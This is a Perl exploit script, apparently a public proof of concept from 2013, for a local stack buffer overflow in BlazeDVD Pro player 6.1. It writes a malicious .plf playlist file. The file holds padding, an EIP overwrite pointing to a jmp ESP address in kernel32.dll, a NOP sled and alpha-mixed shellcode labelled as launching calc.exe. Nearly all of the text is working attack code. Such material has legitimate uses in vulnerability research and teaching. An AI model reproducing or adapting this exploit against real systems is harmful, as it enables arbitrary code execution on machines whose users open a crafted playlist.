#!/usr/bin/perl
# BlazeDVD Pro player 6.1 Local stack based buffer overflow
# Author: PuN1sh3r
# Email: luiguibiker@gmail.com
# Date: Mon Jul 15 03:01:37 EDT 2013
# Vendor link: http://www.blazevideo.com/download.htmm
# Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro
# App Version: 6.1
# Tested on: Windows 2003 server sp1(EN)
# special thanks to corelanc0d3r for his amazing tutorials
$file
=
"blazeExpl.plf"
;
$junk
=
"\x41"
x 260;
$eip
=
"\x33\xFE\xE4\x77"
;
#jmp ESP on kernel32.dll
#msf win/exec calc.exe [*] x86/alpha_mixed
$shellcode
=
"\x89\xe7\xda\xd4\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49"
.
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
.
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
.
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
.
"\x42\x75\x4a\x49\x49\x6c\x78\x68\x4d\x59\x67\x70\x77\x70"
.
"\x43\x30\x65\x30\x6b\x39\x5a\x45\x76\x51\x59\x42\x52\x44"
.
"\x6e\x6b\x71\x42\x46\x50\x6e\x6b\x56\x32\x36\x6c\x4e\x6b"
.
"\x53\x62\x66\x74\x6c\x4b\x33\x42\x36\x48\x34\x4f\x6f\x47"
.
"\x51\x5a\x75\x76\x75\x61\x39\x6f\x45\x61\x79\x50\x6c\x6c"
.
"\x67\x4c\x70\x61\x53\x4c\x66\x62\x36\x4c\x57\x50\x5a\x61"
.
"\x7a\x6f\x46\x6d\x63\x31\x5a\x67\x4a\x42\x4a\x50\x72\x72"
.
"\x33\x67\x6c\x4b\x76\x32\x76\x70\x6c\x4b\x53\x72\x35\x6c"
.
"\x46\x61\x4a\x70\x6e\x6b\x31\x50\x50\x78\x6b\x35\x39\x50"
.
"\x54\x34\x62\x6a\x67\x71\x4e\x30\x30\x50\x6c\x4b\x52\x68"
.
"\x35\x48\x6e\x6b\x70\x58\x51\x30\x43\x31\x6a\x73\x5a\x43"
.
"\x55\x6c\x43\x79\x6c\x4b\x37\x44\x4c\x4b\x37\x71\x69\x46"
.
"\x36\x51\x39\x6f\x46\x51\x4f\x30\x4e\x4c\x4f\x31\x5a\x6f"
.
"\x64\x4d\x37\x71\x5a\x67\x46\x58\x79\x70\x43\x45\x4b\x44"
.
"\x77\x73\x31\x6d\x4b\x48\x47\x4b\x51\x6d\x46\x44\x50\x75"
.
"\x39\x72\x30\x58\x6c\x4b\x53\x68\x75\x74\x35\x51\x59\x43"
.
"\x65\x36\x6c\x4b\x36\x6c\x52\x6b\x6e\x6b\x42\x78\x47\x6c"
.
"\x63\x31\x48\x53\x6e\x6b\x63\x34\x4e\x6b\x56\x61\x7a\x70"
.
"\x6c\x49\x73\x74\x34\x64\x56\x44\x63\x6b\x53\x6b\x43\x51"
.
"\x61\x49\x43\x6a\x66\x31\x4b\x4f\x4b\x50\x31\x48\x71\x4f"
.
"\x33\x6a\x6c\x4b\x32\x32\x48\x6b\x6e\x66\x31\x4d\x51\x7a"
.
"\x76\x61\x6c\x4d\x6e\x65\x4f\x49\x37\x70\x67\x70\x63\x30"
.
"\x72\x70\x70\x68\x44\x71\x4e\x6b\x32\x4f\x6b\x37\x39\x6f"
.
"\x38\x55\x4f\x4b\x7a\x50\x6d\x65\x6c\x62\x70\x56\x55\x38"
.
"\x6f\x56\x4d\x45\x6d\x6d\x6f\x6d\x39\x6f\x4b\x65\x55\x6c"
.
"\x74\x46\x63\x4c\x55\x5a\x6d\x50\x49\x6b\x6b\x50\x64\x35"
.
"\x67\x75\x6f\x4b\x72\x67\x57\x63\x71\x62\x62\x4f\x30\x6a"
.
"\x57\x70\x36\x33\x69\x6f\x68\x55\x73\x53\x61\x71\x72\x4c"
.
"\x30\x63\x44\x6e\x70\x65\x32\x58\x32\x45\x65\x50\x41\x41"
;
$junk
.=
$eip
.
"\x90"
x 50 .
$shellcode
;
###############################################################
open
(FILE,
">$file"
);
print
FILE
$junk
;
close
(FILE);
###############################################################